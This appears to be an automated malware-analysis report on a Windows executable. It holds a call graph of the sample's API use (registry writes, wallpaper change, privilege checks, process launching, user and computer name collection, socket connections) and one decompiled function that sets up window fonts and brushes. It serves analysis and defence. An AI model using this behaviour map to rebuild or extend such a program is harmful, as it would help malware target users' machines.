6238 405390 #940 6231->6238 6235 4054b4 6232->6235 6236 405435 7 API calls 6232->6236 6233->6225 6234->6226 6237 405277 #940 6234->6237 6239 4054b8 6235->6239 6241 405503 6235->6241 6236->6225 6237->6226 6237->6237 6238->6229 6238->6238 6239->6225 6240 4054de #6778 #6648 6239->6240 6240->6240 6242 405501 6240->6242 6241->6225 6241->6230 6243 405529 #6778 #6648 6241->6243 6242->6225 6243->6225 6243->6243 6244 40d630 6249 40d650 6244->6249 6246 40d638 6247 40d648 6246->6247 6248 40d63f #825 6246->6248 6248->6247 6250 40dad0 4 API calls 6249->6250 6251 40d680 6250->6251 6251->6246 6100 402531 6101 402543 6100->6101 6102 40253c CloseHandle 6100->6102 6103 402555 6101->6103 6104 40254e CloseHandle 6101->6104 6102->6101 6104->6103 6252 40ca3a 6255 40ca40 6252->6255 6253 40ca81 6254 40ca87 #825 6254->6253 6255->6253 6255->6254 5976 4068c0 #4837 6256 4032c0 6 API calls 6257 403334 SendMessageA #3092 6256->6257 6259 40335c SendMessageA #3092 6257->6259 6261 40337b SendMessageA #3092 6259->6261 6263 4033a0 SendMessageA 6261->6263 6264 40339d 6261->6264 6267 403cb0 FindFirstFileA 6263->6267 6264->6263 6266 4033b2 SendMessageA #3996 SendMessageA 6268 403cd9 6267->6268 6269 403ce3 6267->6269 6268->6266 6270 403e1f FindNextFileA 6269->6270 6272 403d14 sscanf 6269->6272 6270->6269 6271 403e3a FindClose 6270->6271 6271->6266 6272->6270 6273 403d38 fopen 6272->6273 6273->6270 6274 403d5c fread 6273->6274 6275 403e15 fclose 6274->6275 6279 403d7b 6274->6279 6275->6270 6276 403d8f sprintf 6277 403dd4 SendMessageA #823 SendMessageA 6276->6277 6277->6275 6279->6275 6279->6276 6279->6277 6280 401c30 inet_ntoa 6279->6280 6280->6279 6454 4043c0 #6453 #2414 6455 409fc0 TextOutA 5122 4064d0 #4710 SendMessageA SendMessageA 5165 401c70 wcscat 5122->5165 5124 406516 5125 406577 5124->5125 5126 40651d GetModuleFileNameA strrchr 5124->5126 5174 401a10 5125->5174 5127 40656c SetCurrentDirectoryA 5126->5127 5128 40655d strrchr 5126->5128 5127->5125 5128->5127 5130 406585 5131 4065e5 5130->5131 5132 40658c time 5130->5132 5184 402c40 5131->5184 5133 401a10 5 API calls 5132->5133 5133->5131 5135 4065ed __p___argc 5136 406606 5135->5136 5137 40678c 5136->5137 5138 40660f __p___argv 5136->5138 5190 407e80 SHGetFolderPathW wcslen 5137->5190 5140 406621 5138->5140 5143 406661 __p___argv 5140->5143 5144 406652 5140->5144 5141 406793 SetWindowTextW 5193 406f80 5141->5193 5147 40666d 5143->5147 5260 407f80 fopen 5144->5260 5145 4067a9 5251 406c20 GetUserDefaultLangID GetLocaleInfoA 5145->5251 5151 4066ad __p___argv 5147->5151 5152 40669e 5147->5152 5150 4067b0 SetTimer SetTimer 5154 4066b9 5151->5154 5270 4080c0 FindFirstFileA 5152->5270 5154->5137 5156 4066ee Sleep 5154->5156 5288 401bb0 AllocateAndInitializeSid 5156->5288 5158 406734 5159 406750 sprintf 5158->5159 5160 406738 5158->5160 5294 401a90 CreateProcessA 5159->5294 5293 401b50 ShellExecuteExA 5160->5293 5163 40674b ExitProcess 5166 401cdc 5165->5166 5167 401d00 RegCreateKeyW 5166->5167 5168 401d62 RegQueryValueExA 5166->5168 5169 401d1d GetCurrentDirectoryA RegSetValueExA 5166->5169 5170 401dbb 5166->5170 5167->5166 5171 401d9e RegCloseKey 5168->5171 5172 401d90 SetCurrentDirectoryA 5168->5172 5169->5171 5170->5124 5171->5166 5173 401dc8 5171->5173 5172->5171 5173->5124 5175 401a1a fopen 5174->5175 5177 401a3a 5175->5177 5178 401a6f 5175->5178 5179 401a53 fwrite 5177->5179 5180 401a46 fread 5177->5180 5178->5130 5181 401a5e 5179->5181 5180->5181 5182 401a74 fclose 5181->5182 5183 401a66 fclose 5181->5183 5182->5130 5183->5178 5302 404b70 5184->5302 5186 402c46 5187 402c57 5186->5187 5188 402c5e LoadLibraryA 5186->5188 5187->5135 5188->5187 5189 402c73 7 API calls 5188->5189 5189->5187 5191 407f02 5190->5191 5192 407f09 swprintf MultiByteToWideChar CopyFileW SystemParametersInfoW 5190->5192 5191->5141 5192->5141 5307 4076a0 5193->5307 5195 406fa8 27 API calls 5196 407119 5195->5196 5197 40711c SendMessageA #3092 5195->5197 5196->5197 5198 40713d SendMessageA #3092 5197->5198 5200 40715f SendMessageA #3092 5198->5200 5202 407181 SendMessageA #3092 5200->5202 5204 4071a3 SendMessageA #3092 5202->5204 5206 4071c5 SendMessageA #3092 5204->5206 5208 4071e7 5206->5208 5209 4071ea SendMessageA #3092 5206->5209 5208->5209 5210 407205 SendMessageA #3092 5209->5210 5212 407227 SendMessageA #3092 5210->5212 5214 407249 SendMessageA #3092 5212->5214 5216 40726b 5214->5216 5217 40726e SendMessageA #860 5214->5217 5216->5217 5218 4072a4 5217->5218 5219 4072ed #537 5218->5219 5323 404210 #858 #800 5219->5323 5221 407309 #537 5324 404210 #858 #800 5221->5324 5223 407325 #540 #2818 #535 5325 404210 #858 #800 5223->5325 5225 407369 5326 404270 5225->5326 5229 4073a8 SendMessageA SendMessageA #6140 #6140 5230 407428 5229->5230 5330 405920 5230->5330 5234 407457 5338 4058c0 5234->5338 5236 407460 5341 405180 _mbscmp 5236->5341 5238 407477 5239 405920 2 API calls 5238->5239 5240 4074ac 5239->5240 5241 405860 2 API calls 5240->5241 5242 4074b5 5241->5242 5243 4058c0 2 API calls 5242->5243 5244 4074be 5243->5244 5245 405180 4 API calls 5244->5245 5246 4074d5 GetTimeZoneInformation 5245->5246 5347 401e60 VariantTimeToSystemTime 5246->5347 5248 407508 SystemTimeToTzSpecificLocalTime #2818 5348 401e60 VariantTimeToSystemTime 5248->5348 5250 40759b SystemTimeToTzSpecificLocalTime #2818 #6334 #800 5250->5145 5252 406c81 SendMessageA 5251->5252 5253 406c5d 5251->5253 5254 406cc1 SendMessageA 5252->5254 5255 406ca1 SendMessageA 5252->5255 5253->5252 5355 406ae0 8 API calls 5254->5355 5256 406ae0 27 API calls 5255->5256 5258 406cba 5256->5258 5258->5150 5259 406cdd 5259->5150 5261 407fd0 fread fclose 5260->5261 5262 406659 ExitProcess 5260->5262 5374 40be90 strncpy strncpy strncpy 5261->5374 5264 408002 5375 40c4f0 5264->5375 5266 40801d 5267 40c4f0 112 API calls 5266->5267 5268 408041 5266->5268 5267->5268 5268->5262 5269 401a10 5 API calls 5268->5269 5269->5262 5271 408124 5270->5271 5272 40820a 5270->5272 5275 4081e4 FindNextFileA 5271->5275 5278 408158 sscanf 5271->5278 5284 4081bd fclose 5271->5284 5389 401e30 5272->5389 5275->5271 5276 4081ff FindClose 5275->5276 5276->5272 5277 401e30 2 API calls 5279 408255 sprintf #537 5277->5279 5278->5275 5280 408178 fopen 5278->5280 5394 4082c0 5279->5394 5280->5275 5282 408190 fread 5280->5282 5282->5271 5282->5284 5284->5271 5284->5275 5285 408291 #537 5287 4082c0 141 API calls 5285->5287 5286 4066a5 ExitProcess 5287->5286 5289 401bf6 5288->5289 5290 401bfb CheckTokenMembership 5288->5290 5289->5158 5291 401c10 5290->5291 5292 401c14 FreeSid 5290->5292 5291->5292 5292->5158 5293->5163 5295 401b45 5294->5295 5296 401aed 5294->5296 5295->5163 5297 401af5 WaitForSingleObject 5296->5297 5298 401b26 CloseHandle CloseHandle 5296->5298 5299 401b12 5297->5299 5300 401b05 TerminateProcess 5297->5300 5298->5163 5299->5298 5301 401b1a GetExitCodeProcess 5299->5301 5300->5299 5301->5298 5303 404b81 LoadLibraryA 5302->5303 5304 404b7a 5302->5304 5305 404b96 6 API calls 5303->5305 5306 404bf6 5303->5306 5304->5186 5305->5306 5306->5186 5308 4076d9 time 5307->5308 5310 4076d7 5308->5310 5309 407771 sprintf 5309->5310 5310->5308 5310->5309 5311 405180 4 API calls 5310->5311 5312 407842 SendMessageA SendMessageA #540 5310->5312 5311->5310 5313 407894 5312->5313 5314 4078aa _ftol #2818 #2818 5313->5314 5315 4078db #2818 #2818 5313->5315 5316 407911 #3092 #6199 5314->5316 5315->5316 5317 407990 #800 5316->5317 5318 407940 5316->5318 5317->5195 5318->5317 5319 407952 InvalidateRect 5318->5319 5320 405920 2 API calls 5319->5320 5321 407978 5320->5321 5322 405920 2 API calls 5321->5322 5322->5317 5323->5221 5324->5223 5325->5225 5349 4044c0 5326->5349 5329 404210 #858 #800 5329->5229 5353 405950 InvalidateRect 5330->5353 5332 40592d 5354 405970 InvalidateRect 5332->5354 5334 40593e 5335 405860 5334->5335 5336 405872 5335->5336 5337 405875 GetClientRect #6197 5335->5337 5336->5337 5337->5234 5339 4058d2 5338->5339 5340 4058d5 GetClientRect #6197 5338->5340 5339->5340 5340->5236 5342 4051f8 5341->5342 5343 40519e #860 5341->5343 5342->5238 5344 4051b1 5343->5344 5345 4051d1 RedrawWindow 5344->5345 5346 4051ea InvalidateRect 5344->5346 5345->5238 5346->5342 5347->5248 5348->5250 5350 4044f8 GetObjectA CreateFontIndirectA #1641 5349->5350 5351 4044ce GetParent #2864 SendMessageA #2860 5349->5351 5352 40427a #2818 #535 5350->5352 5351->5350 5351->5352 5352->5329 5353->5332 5354->5334 5356 406b88 #537 #924 sprintf #800 #800 5355->5356 5357 406bda 5355->5357 5356->5357 5360 406cf0 5357->5360 5359 406be6 #800 5359->5259 5361 406d16 5360->5361 5362 406d19 SendMessageA #353 SendMessageA #1979 5360->5362 5361->5362 5365 406dc0 SendMessageA #823 5362->5365 5366 406e00 SendMessageA 5365->5366 5367 406d7b #665 5365->5367 5369 406ed2 #825 5366->5369 5370 406e2f _strnicmp 5366->5370 5367->5359 5369->5367 5371 406e4b _strnicmp 5370->5371 5372 406e67 5370->5372 5371->5372 5372->5369 5372->5370 5373 406e87 SendMessageA #6136 5372->5373 5373->5372 5374->5264 5376 40c50f 5375->5376 5377 40bed0 110 API calls 5376->5377 5378 40c54b 5377->5378 5379 40c596 5378->5379 5380 40dd00 4 API calls 5378->5380 5381 40dbf0 free 5379->5381 5383 40c568 5380->5383 5382 40c5e7 5381->5382 5382->5266 5383->5379 5384 40c600 5383->5384 5385 40c635 5384->5385 5386 40c617 strncpy 5384->5386 5387 40dbf0 free 5385->5387 5386->5385 5388 40c650 5387->5388 5388->5266 5421 401e60 VariantTimeToSystemTime 5389->5421 5391 401e42 5422 401de0 sprintf 5391->5422 5393 401e51 5393->5277 5395 408337 5394->5395 5396 4082fb #4278 #858 #800 5394->5396 5397 408344 5395->5397 5398 408378 time 5395->5398 5396->5395 5399 408359 #800 5397->5399 5400 40834d #1200 5397->5400 5401 40839c 5398->5401 5402 40844d time 5398->5402 5403 40828c 5399->5403 5400->5399 5401->5402 5404 4083a9 5401->5404 5402->5404 5405 408466 5402->5405 5403->5285 5403->5286 5406 4083bb 5404->5406 5407 40846c fopen 5404->5407 5405->5407 5408 4083c4 #540 time #2818 #1200 #800 5406->5408 5409 40842e #800 5406->5409 5410 4084b5 fread fclose 5407->5410 5411 408496 #800 5407->5411 5408->5409 5409->5403 5423 40be90 strncpy strncpy strncpy 5410->5423 5411->5403 5413 4084e7 5424 40c060 5413->5424 5415 408501 5416 408516 5415->5416 5417 408538 5415->5417 5418 408549 #800 5416->5418 5419 40851a #1200 time 5416->5419 5417->5418 5420 40853c #1200 5417->5420 5418->5403 5419->5418 5420->5418 5421->5391 5422->5393 5423->5413 5425 40c07f 5424->5425 5426 40bed0 110 API calls 5425->5426 5427 40c0ba 5426->5427 5428 40c0c1 5427->5428 5429 40c0e7 5427->5429 5430 40c0cc SendMessageA 5428->5430 5433 40c0db 5428->5433 5431 40c104 5429->5431 5432 40c0f8 SendMessageA 5429->5432 5430->5433 5434 40dd00 4 API calls 5431->5434 5432->5431 5435 40dbf0 free 5433->5435 5437 40c116 5434->5437 5436 40c173 5435->5436 5436->5415 5438 40c144 5437->5438 5439 40c17b 5437->5439 5440 40c154 5438->5440 5441 40c148 SendMessageA 5438->5441 5442 40c18b 5439->5442 5443 40c17f SendMessageA 5439->5443 5444 40dbf0 free 5440->5444 5441->5440 5445 40c1b4 5442->5445 5446 40c1e8 5442->5446 5443->5442 5444->5436 5447 40c1c4 5445->5447 5448 40c1b8 SendMessageA 5445->5448 5446->5433 5449 40c1f5 SendMessageA 5446->5449 5450 40dbf0 free 5447->5450 5448->5447 5449->5433 5450->5436 6106 4059d0 #561 5451 40dad0 5452 40db33 5451->5452 5453 40dadf setsockopt send shutdown closesocket 5451->5453 5453->5452 6456 40dbd0 6457 40dbf0 free 6456->6457 6458 40dbd8 6457->6458 6459 40dbe8 6458->6459 6460 40dbdf #825 6458->6460 6460->6459 5454 40bed0 5455 40bef5 5454->5455 5456 40bf0a #823 5454->5456 5455->5456 5457 40bf2e 5456->5457 5458 40bf27 5456->5458 5460 40bf46 5457->5460 5461 40baf0 99 API calls 5457->5461 5459 40d5e0 4 API calls 5458->5459 5459->5457 5462 40bf6b 5461->5462 5463 40bf72 5462->5463 5464 40bf8a GetComputerNameA GetUserNameA 5462->5464 5465 40dc00 4 API calls 5464->5465 5466 40c013 5465->5466 5467 40dd00 4 API calls 5466->5467 5468 40c01f 5467->5468 5469 40dc00 4 API calls 5468->5469 5470 40c038 5469->5470 5471 40dd00 4 API calls 5470->5471 5472 40c047 5471->5472 5977 404cd0 5982 404cf0 #2414 #2414 #800 #641 5977->5982 5979 404cd8 5980 404ce8 5979->5980 5981 404cdf #825 5979->5981 5981->5980 5982->5979 6105 4019d0 EnableWindow 6107 404dd0 6 API calls 6108 404e3b SendMessageA #3092 6107->6108 6110 404e60 SendMessageA #3092 6108->6110 6112 404e93 SendMessageA 6110->6112 6113 404e7f SendMessageA 6110->6113 6281 4102d0 free 5983 4130d4 ??1type_info@@UAE 5984 4130e3 #825 5983->5984 5985 4130ea 5983->5985 5984->5985 5483 4068e0 5484 4068ef 5483->5484 5485 40691a #5280 5484->5485 5486 4068fc 5484->5486 6282 4086e0 #470 GetClientRect SendMessageA #6734 #323 6283 408765 6282->6283 6284 408838 6283->6284 6287 4087bd CreateCompatibleDC #1640 6283->6287 6285 408885 #2754 6284->6285 6286 408869 FillRect 6284->6286 6288 408897 #2381 6285->6288 6286->6288 6314 409e70 CreateCompatibleBitmap #1641 6287->6314 6291 4088b4 6288->6291 6292 408a7d 6288->6292 6291->6292 6294 4088be #3797 6291->6294 6296 409f80 BitBlt 6292->6296 6310 408a5e 6292->6310 6293 408809 6315 409f10 6293->6315 6297 408901 _ftol 6294->6297 6299 408abe 6296->6299 6304 40895e _ftol 6297->6304 6306 40897e 6297->6306 6298 408817 #6194 6298->6284 6301 408ad5 #5785 6299->6301 6302 408ac6 #5785 6299->6302 6301->6310 6302->6310 6304->6306 6305 408afe #640 #755 6307 4089a7 FillRect 6306->6307 6308 4089b8 FillRect 6306->6308 6309 4089ca 6306->6309 6307->6309 6308->6309 6309->6310 6318 409f80 6309->6318 6321 409e20 #2414 6310->6321 6312 408a50 6313 409f10 2 API calls 6312->6313 6313->6310 6314->6293 6316 409f25 #5785 6315->6316 6317 409f18 #5785 6315->6317 6316->6298 6317->6298 6319 409f88 6318->6319 6320 409f8b BitBlt 6318->6320 6319->6320 6320->6312 6321->6305 6322 40c6e0 6323 40c722 #825 6322->6323 6324 40c6ef 6322->6324 6325 40c7b0 #825 6324->6325 6326 40c70d #825 6325->6326 6326->6324 6327 40c721 6326->6327 6327->6323 6474 40cfe0 6481 40d4c0 6474->6481 6476 40cffb 6477 40d4c0 4 API calls 6476->6477 6480 40d05e 6476->6480 6478 40d031 6477->6478 6479 40d4c0 4 API calls 6478->6479 6478->6480 6479->6480 6482 40d4d0 6481->6482 6483 40d4d9 6481->6483 6482->6476 6484 40d4e4 6483->6484 6485 40d4ee time 6483->6485 6484->6476 6486 40d575 6485->6486 6491 40d50a 6485->6491 6487 40d58a 6486->6487 6488 40d2b0 memmove 6486->6488 6487->6476 6488->6487 6489 40d569 time 6489->6486 6489->6491 6490 40d551 Sleep 6490->6491 6491->6486 6491->6489 6491->6490 5609 4043e0 #4284 #3874 #5277 5986 40a0e0 Escape 6465 404fe0 #6334 6466 404ff4 #4853 6465->6466 6467 404ffb 6465->6467 6466->6467 6126 405df0 6131 405d90 #654 #765 6126->6131 6128 405df8 6129 405e08 6128->6129 6130 405dff #825 6128->6130 6130->6129 6131->6128 5987 4090f0 5988 409124 #540 #3874 5987->5988 5989 40971e 5987->5989 5990 409185 5988->5990 5991 40915e 5988->5991 5993 40919c _ftol 5990->5993 5994 40918e #860 5990->5994 5992 40917c 5991->5992 5995 40916e #860 5991->5995 5996 4091d5 SendMessageA #2860 5992->5996 5997 40970a #800 5992->5997 5993->5992 5994->5993 5995->5992 5998 409208 5996->5998 5997->5989 6013 409870 5998->6013 6000 409232 #5875 #6170 GetWindowOrgEx #540 #2818 6002 409329 GetObjectA 6000->6002 6003 40935b GetTextExtentPoint32A 6000->6003 6002->6003 6005 40938b GetViewportOrgEx 6003->6005 6009 409411 6005->6009 6006 409630 #800 6007 409662 6006->6007 6008 40965a #6170 6006->6008 6010 409685 #2414 #2414 6007->6010 6011 40967d #5875 6007->6011 6008->6007 6009->6006 6010->5997 6011->6010 6014 409880 #2414 6013->6014 6014->6000 6328 406ef0 6329 406f03 #823 6328->6329 6330 406f6a 6328->6330 6329->6330 6331 406f25 SendMessageA ShellExecuteA #825 6329->6331 6331->6330 6115 4019f0 #765 6116 401a08 6115->6116 6117 4019ff #825 6115->6117 6117->6116 6118 4011f0 6119 40120b #5280 6118->6119 6120 4011fd 6118->6120 6120->6119 6121 401203 6120->6121 6122 4059f0 6123 4059f8 6122->6123 6124 405a08 6123->6124 6125 4059ff #825 6123->6125 6125->6124 6492 4067f0 IsIconic 6493 406808 7 API calls 6492->6493 6494 40689a #2379 6492->6494 6495 409ff0 ExtTextOutA 6496 406380 6501 405e10 #2414 #2414 #2414 #2414 6496->6501 6498 406388 6499 406398 6498->6499 6500 40638f #825 6498->6500 6500->6499 6530 403f20 #2414 6501->6530 6503 405ed6 6531 403f20 #2414 6503->6531 6505 405eec 6532 403f20 #2414 6505->6532 6507 405f02 6533 403f20 #2414 6507->6533 6509 405f18 #2414 6534 403f20 #2414 6509->6534 6511 405f50 6535 403f20 #2414 6511->6535 6513 405f66 6536 403f20 #2414 6513->6536 6515 405f7c 6 API calls 6537 4050a0 #800 #795 6515->6537 6517 405ffe 6538 4050a0 #800 #795 6517->6538 6519 40600e 6539 404170 #2414 #800 #800 #795 6519->6539 6521 40601e 6540 404170 #2414 #800 #800 #795 6521->6540 6523 40602e 6541 404170 #2414 #800 #800 #795 6523->6541 6525 40603e 6542 404170 #2414 #800 #800 #795 6525->6542 6527 40604e #654 #765 6543 405d90 #654 #765 6527->6543 6529 406087 #609 #609 #616 #641 6529->6498 6530->6503 6531->6505 6532->6507 6533->6509 6534->6511 6535->6513 6536->6515 6537->6517 6538->6519 6539->6521 6540->6523 6541->6525 6542->6527 6543->6529 6016 40d880 6019 40d0a0 time srand rand 6016->6019 6018 40d88f 6020 40d0d3 rand 6019->6020 6021 40d0e1 6019->6021 6020->6020 6020->6021 6021->6018 5074 405580 GetClientRect 5075 4055c7 7 API calls 5074->5075 5076 4057c9 5074->5076 5077 405666 5075->5077 5078 405669 #5785 CreateSolidBrush FillRect 5075->5078 5077->5078 5079 405770 6 API calls 5078->5079 5082 4056b2 5078->5082 5079->5076 5081 4056cd BitBlt 5081->5082 5082->5079 5082->5081 5107 40db80 recv 6022 405080 6027 4050a0 #800 #795 6022->6027 6024 405088 6025 405098 6024->6025 6026 40508f #825 6024->6026 6026->6025 6027->6024 6333 404280 6334 404290 6333->6334 6335 40428b 6333->6335 6337 4042a0 #6663 6334->6337 6338 4042fd #2379 6334->6338 6336 404530 5 API calls 6335->6336 6336->6334 6339 4042b5 GetParent #2864 SendMessageA #2379 6337->6339 6340 4042e7 ShellExecuteA 6337->6340 6340->6338 6132 403180 6137 4031a0 #2414 #2414 #616 #693 #641 6132->6137 6134 403188 6135 403198 6134->6135 6136 40318f #825 6134->6136 6136->6135 6137->6134 6138 408580 #609 6139 408598 6138->6139 6140 40858f #825 6138->6140 6140->6139 6544 409b80 6545 409b99 6544->6545 6546 409ba5 #2379 6545->6546 6547 409b9d 6545->6547 5473 407a90 5474 407bf4 #2385 5473->5474 5475 407abd 5473->5475 5475->5474 5482 404c40 #324 #540 #860 5475->5482 5477 407ae2 #2514 5478 407b72 #2414 #2414 #800 #641 5477->5478 5479 407afb 6 API calls 5477->5479 5478->5474 5480 4082c0 141 API calls 5479->5480 5481 407b61 #800 5480->5481 5481->5478 5482->5477 6141 404d90 #2370 #2289 6028 401091 6033 4010c0 #765 #641 6028->6033 6030 4010a8 6031 4010b8 6030->6031 6032 4010af #825 6030->6032 6032->6031 6033->6030 6341 414290 #825 6048 40a0a0 6049 40a0a8 6048->6049 6050 40a0ab GrayStringA 6048->6050 6049->6050 6051 4034a0 6 API calls 5598 40d6a0 htons socket 5599 40d6f3 bind 5598->5599 5600 40d814 5598->5600 5601 40d717 ioctlsocket 5599->5601 5602 40d809 5599->5602 5601->5602 5603 40d732 connect select 5601->5603 5602->5600 5604 40d80d closesocket 5602->5604 5603->5602 5605 40d78b __WSAFDIsSet 5603->5605 5604->5600 5606 40d79a __WSAFDIsSet 5605->5606 5607 40d7ac ioctlsocket setsockopt setsockopt 5605->5607 5606->5602 5606->5607 5610 4063a0 15 API calls 6160 4085a0 #781 6161 4085b8 6160->6161 6162 4085af #825 6160->6162 6162->6161 6146 4035a0 SendMessageA 6147 4035e5 OpenClipboard 6146->6147 6148 4037e9 6146->6148 6147->6148 6149 4035f7 SendMessageA 6147->6149 6150 403681 GlobalAlloc 6149->6150 6151 40360f #3301 #924 #800 #800 SendMessageA 6149->6151 6152 4037e3 CloseClipboard 6150->6152 6153 40369b GlobalLock 6150->6153 6151->6150 6151->6151 6152->6148 6154 4036b6 SendMessageA 6153->6154 6155 4036aa GlobalFree 6153->6155 6156 4037c3 GlobalUnlock EmptyClipboard SetClipboardData 6154->6156 6158 4036d6 8 API calls 6154->6158 6155->6152 6156->6152 6159 4037bf 6158->6159 6159->6156 6348 40c6a0 6349 40c6b8 6348->6349 6350 40c6aa 6348->6350 6350->6349 6351 40c6be #825 6350->6351 6351->6349 6040 4098a0 6045 4097e0 6040->6045 6042 4098a8 6043 4098b8 6042->6043 6044 4098af #825 6042->6044 6044->6043 6046 409815 6045->6046 6047 40981e #2414 #2414 6045->6047 6046->6047 6047->6042 6352 404aa3 6353 404ab1 6352->6353 6354 404aaa GlobalFree 6352->6354 6355 404ac0 6353->6355 6356 404ab9 CloseHandle 6353->6356 6354->6353 6356->6355 5611 407db0 5618 401000 #324 #567 5611->5618 5613 407dd7 time 5614 407e09 #2514 5613->5614 5615 407dfe 5613->5615 5616 407e34 #765 #641 5614->5616 5617 407e28 time 5614->5617 5615->5614 5617->5616 5618->5613 6052 407cb0 6055 4030e0 #324 #567 #567 6052->6055 6054 407cd6 6 API calls 6055->6054 6357 40ceb0 6358 40cebc 6357->6358 6359 4130bb 2 API calls 6358->6359 6360 40ceda 6359->6360 6362 4102b0 calloc

                                                      Executed Functions

                                                      Function 00406F80 Relevance: 130.0, APIs: 67, Strings: 7, Instructions: 536windowtimeCOMMONCrypto
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 406f80-407117 call 4076a0 CreateSolidBrush #1641 CreateSolidBrush #1641 CreateSolidBrush #1641 CreateSolidBrush #1641 CreateSolidBrush #1641 CreateSolidBrush #1641 CreateSolidBrush #1641 CreateSolidBrush #1641 CreateSolidBrush #1641 CreateSolidBrush #1641 CreateFontA #1641 CreateFontA #1641 CreateFontA #1641 #3092 3 407119 0->3 4 40711c-40713b SendMessageA #3092 0->4 3->4 5 407141 4->5 6 40713d-40713f 4->6 7 407144-40715d SendMessageA #3092 5->7 6->7 8 407163 7->8 9 40715f-407161 7->9 10 407166-40717f SendMessageA #3092 8->10 9->10 11 407181-407183 10->11 12 407185 10->12 13 407188-4071a1 SendMessageA #3092 11->13 12->13 14 4071a3-4071a5 13->14 15 4071a7 13->15 16 4071aa-4071c3 SendMessageA #3092 14->16 15->16 17 4071c5-4071c7 16->17 18 4071c9 16->18 19 4071cc-4071e5 SendMessageA #3092 17->19 18->19 20 4071e7 19->20 21 4071ea-407203 SendMessageA #3092 19->21 20->21 22 407205-407207 21->22 23 407209 21->23 24 40720c-407225 SendMessageA #3092 22->24 23->24 25 407227-407229 24->25 26 40722b 24->26 27 40722e-407247 SendMessageA #3092 25->27 26->27 28 407249-40724b 27->28 29 40724d 27->29 30 407250-407269 SendMessageA #3092 28->30 29->30 31 40726b 30->31 32 40726e-407638 SendMessageA #860 call 404260 * 4 #537 call 404210 #537 call 404210 #540 #2818 #535 call 404210 call 404270 #2818 #535 call 404210 SendMessageA * 2 #6140 * 2 call 405820 call 405800 call 405200 call 405920 call 405860 call 4058c0 call 405990 call 405180 call 405820 call 405800 call 405200 call 405920 call 405860 call 4058c0 call 405990 call 405180 GetTimeZoneInformation call 401e60 SystemTimeToTzSpecificLocalTime #2818 call 401e60 SystemTimeToTzSpecificLocalTime #2818 #6334 #800 30->32 31->32
                                                      C-Code - Quality: 62%
                                                      			E00406F80(void* __ecx, void* __fp0) {
				struct HFONT__* _t135;
				long _t137;
				long _t138;
				long _t139;
				long _t141;
				long _t142;
				long _t143;
				long _t145;
				long _t146;
				long _t147;
				long _t149;
				void* _t214;
				int _t216;
				int _t235;
				int _t238;
				int _t240;
				int _t242;
				int _t245;
				int _t248;
				int _t251;
				int _t253;
				void* _t260;
				void* _t262;
				int _t339;
				void* _t348;
				int _t352;
				intOrPtr _t355;
				intOrPtr _t356;
				intOrPtr _t357;
				intOrPtr _t358;
				void* _t359;
				void* _t360;
				void* _t361;
				void* _t375;

				_t375 = __fp0;
				_push(0xffffffff);
				_push(E00413E9B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t355;
				_t356 = _t355 - 0xd4;
				_t348 = __ecx;
				_push(0);
				E004076A0(__ecx);
				_push(CreateSolidBrush(0xe0));
				L00412D5E();
				_push(CreateSolidBrush(0x121284));
				L00412D5E();
				_push(CreateSolidBrush(0xe000));
				L00412D5E();
				_push(CreateSolidBrush(0xe00000));
				L00412D5E();
				_push(CreateSolidBrush(0));
				L00412D5E();
				_push(CreateSolidBrush(0x3834d1));
				L00412D5E();
				_push(CreateSolidBrush(0x107c10));
				L00412D5E();
				_push(CreateSolidBrush(0xe8a200));
				L00412D5E();
				_push(CreateSolidBrush(0xd77800));
				L00412D5E();
				_push(CreateSolidBrush(0x3cda));
				L00412D5E();
				_t339 = __ecx + 0x880;
				_push(CreateFontA(0x18, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial"));
				L00412D5E();
				_t216 = __ecx + 0x888;
				_push(CreateFontA(0x12, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial"));
				L00412D5E();
				_t352 = __ecx + 0x890;
				_t135 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t135);
				L00412D5E();
				_push(0x3ed);
				L00412CE6();
				if(_t339 != 0) {
					_t339 =  *(_t339 + 4);
				}
				_t137 = SendMessageA( *(_t135 + 0x20), 0x30, _t339, 1);
				_push(0x3fe);
				L00412CE6();
				if(_t216 != 0) {
					_t235 =  *(_t216 + 4);
				} else {
					_t235 = 0;
				}
				_t138 = SendMessageA( *(_t137 + 0x20), 0x30, _t235, 1);
				_push(0x3fb);
				L00412CE6();
				if(_t216 != 0) {
					_t238 =  *(_t216 + 4);
				} else {
					_t238 = 0;
				}
				_t139 = SendMessageA( *(_t138 + 0x20), 0x30, _t238, 1);
				_push(0x3ff);
				L00412CE6();
				if(_t352 != 0) {
					_t240 =  *(_t352 + 4);
				} else {
					_t240 = 0;
				}
				_t141 = SendMessageA( *(_t139 + 0x20), 0x30, _t240, 1);
				_push(0x3fc);
				L00412CE6();
				if(_t352 != 0) {
					_t242 =  *(_t352 + 4);
				} else {
					_t242 = 0;
				}
				_t142 = SendMessageA( *(_t141 + 0x20), 0x30, _t242, 1);
				_push(0x400);
				L00412CE6();
				if(_t352 != 0) {
					_t245 =  *(_t352 + 4);
				} else {
					_t245 = 0;
				}
				_t143 = SendMessageA( *(_t142 + 0x20), 0x30, _t245, 1);
				_push(0x3fa);
				L00412CE6();
				if(_t352 != 0) {
					_t352 =  *(_t352 + 4);
				}
				_t145 = SendMessageA( *(_t143 + 0x20), 0x30, _t352, 1);
				_push(0x402);
				L00412CE6();
				if(_t216 != 0) {
					_t248 =  *(_t216 + 4);
				} else {
					_t248 = 0;
				}
				_t146 = SendMessageA( *(_t145 + 0x20), 0x30, _t248, 1);
				_push(0x3ef);
				L00412CE6();
				if(_t216 != 0) {
					_t251 =  *(_t216 + 4);
				} else {
					_t251 = 0;
				}
				_t147 = SendMessageA( *(_t146 + 0x20), 0x30, _t251, 1); // executed
				_push(0x3eb);
				L00412CE6();
				if(_t216 != 0) {
					_t253 =  *(_t216 + 4);
				} else {
					_t253 = 0;
				}
				_t149 = SendMessageA( *(_t147 + 0x20), 0x30, _t253, 1);
				_push(0x3ec);
				L00412CE6();
				if(_t216 != 0) {
					_t216 =  *(_t216 + 4);
				}
				SendMessageA( *(_t149 + 0x20), 0x30, _t216, 1);
				_push(_t348 + 0x5be);
				L00412DA0();
				E00404260(_t348 + 0x228,  *(_t348 + 0x824) ^ 0x00ffffff);
